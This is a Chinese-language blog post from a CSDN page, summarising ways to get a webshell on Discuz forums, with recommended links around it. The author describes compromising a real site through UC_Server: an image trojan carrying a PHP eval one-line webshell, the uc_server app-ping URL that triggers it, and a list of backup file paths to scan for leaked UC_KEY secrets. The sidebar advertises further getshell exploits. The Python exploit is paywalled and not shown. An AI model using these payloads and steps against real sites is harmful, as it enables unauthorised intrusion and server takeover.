DZ拿shell总结

最新推荐文章于 2022-09-08 16:32:50 发布
最新推荐文章于 2022-09-08 16:32:50 发布
阅读量1.2w 收藏 6
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h4ck0ne/article/details/50570770
版权
本文介绍了如何利用UC_KEY和UC_Server的默认密码来获取Discuz论坛的shell。通过UC_Server可以重置管理员密码或者直接拿shell。此外,详细讲述了如何通过扫描特定文件获取UC_KEY,以及如何利用UC_KEY在不同版本的Discuz中获取webshell。提供了PHP和Python版本的exp代码,用于在Discuz X1.5, X2.5, X3上获取webshell。" 107959505,9994133,IDEA连接MySQL时区错误解决,"['数据库', 'IDEA', 'MySQL', '连接问题', '配置']
摘要由CSDN通过智能技术生成

今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下

Uc_server默认密码

其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码

可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿

先说一下UCkey拿shell,uckey可以进uc_server后台看

附一张dz3的图

当然有了uc-server的权限可以直接拿shell的

下面我演示直接拿shell

首先上传一张图片马到论坛

/data/attachment/forum/201511/07//174818npewlpqlzaepi9dw.jpg

图片木马制作:copy 1.jpg/b+1.txt/a 2.jpg

  1. txt内容
  2. <?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>
  3. 在当前目录下生成一句话f.php

应用管理 添加应用

添加应用

填好了内容之后,访问应用连接

http://newbbs.play.ifeng.com/uc_server/admin.php?m=app&a=ping&appid=【应用id

应用id在应用列表里有

uc_server目录下会生成f.php 密码f

菜刀连接之

下面讲利用uc_key拿shell

通常可以通过扫描这些文件获取DiscuzUC_KEY

/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/config/config_global.php.zip
/config/config_global.php.rar
/config/config_global.tar.gz
/uc_server/data/config.inc.php.zip
/wwwroot.zip
/wwwroot.rar
/www.rar
/www.zip
/web.rar
/web.zip
/webbak.zip

UC_KEYconfig/config_ucenter.php里面

 

Discuz X1.5 X2.5 X3uc_keyget webshell

uc_keyUC客户端与服务端通信的通信密钥。因此使用uc_keyfetshell只能获取UCenter Clientwebshell,即Discuiz!论坛的webshell。如果一个服务器上只有UCenter Server是不能通过uc_key来获取该服务器上的webshell的(不过可以通过uc_key来将服务器上的数据并重置用户口令,后面讲)。

90分享的php版的exp代码,但uc_keyurl是嵌入在代码中的,因此导致使用不方便。所以我将代码改成python版的,以后使用就方便了。代码如下:

最低0.47元/天 解锁文章
「已注销」
关注
gentlexue#POC-3#Discuz 3.4 最新版后台getshell1
07-25
Discuz 3.4 最新版后台getshell详情可以看这篇文章:
Discuz利用UC_KEY进行前台getshell
aixuan9365的博客
06-02 999
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html 先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行。 先附上来源中的脚本。修改了一些代码。 <?php $timestamp = ti...
7.2 discuzshell_Discuz 7.2FAQ-GETshell
weixin_42608299的博客
02-15 534
#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*-# author sbimport sysimport hashlibimport timeimport mathimport base64import urllib2import urllibimport redef s...
discuz上传图片提示附件文件无法保存
weixin_30600503的博客
03-30 1066
两个可能: 1.服务器文件夹权限不足 discuz附件保存在./data/attachments下,data文件夹的属性要求必须为777 #cd到data的上一级目录然后执行: chmod -R 777 data 2.附件目录错误 进入dz后台->全局->上传设置->本地附件保存位置,将路径改为绝对路径 比如原来的路径为: ./dat...
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
dz 所有版本后台GET SHELL1
08-08
论坛系统在不同版本中存在的后台GET SHELL漏洞,以及如何利用这些漏洞获取Webshell。Webshell是指攻击者在目标服务器上上传或创建的一个后门程序,允许远程控制服务器。 1. **Discuz! 6.0 和 Discuz! 7.0 漏洞利用*...
dz1900119_dz_zip_
10-03
【标题】"dz1900119_dz_zip_" 指的是一款名为 "dz Zip" 的组件,用于 Delphi 7 开发环境。这个组件是 Delphi 用户用来处理 ZIP 压缩文件的重要工具。 【描述】"dz component delphi 7" 提示我们,dz Zip 是为 ...
dz密码破解
01-04
dz密码破解
易语言获取DZ论坛帖子
08-20
【易语言获取DZ论坛帖子】是一个利用易语言编写的程序,主要目的是通过编程手段从Discuz!(简称DZ)论坛抓取帖子内容。Discuz! 是一款广泛使用的开源社区论坛软件,许多网站和社区都基于它来搭建论坛。在易语言中...
discuz 主题列表调用版块名称方法——搜搜吧
sosoba的博客
11-30 632
discuz 主题列表调用版块名称方法——搜搜吧 <!--{template common/header}--> <!-- header start --> <header class="header"> <div class="nav"> <div class="y"><a href="forum.php?mod=post&action=newthread&fid=$_G[fid]
dz调用图片PHP写法,discuz 帖子列表页调用封面图片代码
weixin_30269201的博客
03-11 820
打开文件:,source/module/forum/forum_forumdisplay.php,找到如下代码,if($thread[‘rushreply’]) {, $rushtids[$thread[‘tid’]] = $thread[‘tid’];,},复制代码,在这段代码下面添加如下代码:,$threada= C::t('forum_attachment')->fetc...
dz调用图片PHP写法,DZ论坛手机版的图片能不能使用静态调用?
weixin_40004212的博客
03-11 272
具体是这样的,我使用七牛的镜像同步了网站的图片到七牛,当网站上传图片的时候网站服务器和七牛各有一份,然后我把服务器的图片删掉,以节省服务器的空间。但是DZ论坛的手机模板中,论坛的图片调用和PC端的不一样,src="forum.php?mod=image&aid=4283&size=600x9999&key=69a089aff8a03fd7&type=fixnone"...
DEDE调用DZ X1.5或者DZ论坛帖子的N种方法
huminghai的专栏
03-20 2253
<br /> 最近在搞一个DZ X1.5与DEDE 5.6整合门户,需要用大量论坛帖来填充DEDE门户内容。因为可以算是第一次操作,所以很多地方比较白目。现在趁此机会汇 总一下调用标签,以备以后再用。<br />    因为大面积涉及到DZ数据,不免在调用贴的同时还要调用相应的图片等信息。在此DEDE的loop万能循环标签就显示出它的无比强大功能,几乎可以调用所 有论坛帖子。但是无法调用帖子图片,这就应用到DEDE的SQl语句标签,可以实现主体与图片双表查询调用功能。<br />    好了,不多说了,简单
Discuz如何解决手机端图片显示模糊
咔咔博客
05-07 2371
本文主要内容:discuz如何解决手机端图片显示模糊问题,主要内容为discuz实现多图上传、图片大图显示、图片高质量显示discuz等功能 最终实现的效果图 实现多图上传 修改文件upload/template/default/touch/forum/post.htm 83行代码 修改内容:添加multiple属性 <li style="padding:0px;"> &...
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3835
网站Getshell的方法
Discuz全局变量防御绕过导致代码执行getshell
ADummy的博客
02-05 587
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 by ADummy 0x00利用路线 ​ Discuz任意帖子页面—>cookie注入命令—>命令执行(phpinfo()或eval一句话)—>getshell 0x01漏洞介绍 ​ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞 ​ 影响版本 Dis
mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
weixin_29915703的博客
01-28 566
### 简要描述:Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......### 详细说明:首先我们开启日志功能,然后存储一个xss看看:测试一个xss页面:[](https://images.seebug.or...
7.2 discuzshell_Discuz! 7.2 SQL注入exp(getshell版)
weixin_39616686的博客
12-22 532
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值